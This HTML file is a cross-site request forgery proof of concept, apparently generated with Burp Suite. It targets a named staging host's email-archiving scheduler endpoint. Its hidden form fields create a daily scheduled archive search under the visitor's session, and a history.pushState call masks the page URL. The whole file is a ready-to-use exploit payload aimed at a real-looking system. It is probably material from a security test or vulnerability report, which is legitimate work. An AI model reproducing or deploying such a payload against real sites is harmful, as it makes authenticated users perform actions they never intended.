<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://cpstaging.appriver.com/ngp/archiving/scheduled/scheduled_scheduling_ajax.php?action=schedule" method="POST">
      <input type="hidden" name="foop" value="deleted" />
      <input type="hidden" name="schedule&#95;advanced&#95;search" value="active" />
      <input type="hidden" name="search&#95;domains" value="" />
      <input type="hidden" name="change&#95;group" value="67965&#46;zixarchive" />
      <input type="hidden" name="s&#95;type" value="advanced" />
      <input type="hidden" name="display&#95;records" value="100" />
      <input type="hidden" name="date&#95;from&#95;display" value="04&#45;27&#45;2022" />
      <input type="hidden" name="date&#95;from" value="2022&#45;04&#45;27" />
      <input type="hidden" name="date&#95;to&#95;display" value="04&#45;28&#45;2022" />
      <input type="hidden" name="date&#95;to" value="2022&#45;04&#45;28" />
      <input type="hidden" name="timezone" value="America&#47;Los&#95;Angeles" />
      <input type="hidden" name="name&#95;the&#95;schedule" value="SL7Test" />
      <input type="hidden" name="schedule&#95;frequency&#95;selector" value="daily" />
      <input type="hidden" name="frequency&#95;value&#91;Monday&#93;" value="Monday" />
      <input type="hidden" name="frequency&#95;value&#91;Tuesday&#93;" value="Tuesday" />
      <input type="hidden" name="frequency&#95;value&#91;Wednesday&#93;" value="Wednesday" />
      <input type="hidden" name="frequency&#95;value&#91;Thursday&#93;" value="Thursday" />
      <input type="hidden" name="frequency&#95;value&#91;Friday&#93;" value="Friday" />
      <input type="hidden" name="frequency&#95;value&#91;Saturday&#93;" value="Saturday" />
      <input type="hidden" name="frequency&#95;value&#91;Sunday&#93;" value="Sunday" />
      <input type="hidden" name="scheduled&#95;timezone" value="America&#47;Los&#95;Angeles" />
      <input type="hidden" name="search&#95;option1&#91;&#93;" value="and" />
      <input type="hidden" name="search&#95;field&#95;name&#91;&#93;" value="to" />
      <input type="hidden" name="search&#95;option2&#91;&#93;" value="" />
      <input type="hidden" name="search&#95;value&#91;&#93;" value="" />
      <input type="hidden" name="header&#95;body&#95;relation" value="and" />
      <input type="hidden" name="search&#95;option1&#91;&#93;" value="and" />
      <input type="hidden" name="search&#95;field&#95;name&#91;&#93;" value="body" />
      <input type="hidden" name="search&#95;option2&#91;&#93;" value="" />
      <input type="hidden" name="search&#95;value&#91;&#93;" value="" />
      <input type="hidden" name="media&#95;types&#91;&#93;" value="email" />
      <input type="hidden" name="viewed&#95;by" value="" />
      <input type="hidden" name="search&#95;reviewer" value="" />
      <input type="hidden" name="escalated&#95;to" value="" />
      <input type="hidden" name="search&#95;direction" value="" />
      <input type="hidden" name="search&#95;direction&#95;inbound" value="inbound" />
      <input type="hidden" name="search&#95;direction&#95;outbound" value="outbound" />
      <input type="hidden" name="queue&#95;search" value="N" />
      <input type="hidden" name="show&#95;spam" value="Y" />
      <input type="hidden" name="search&#95;status" value="" />
      <input type="hidden" name="percent&#95;desired" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
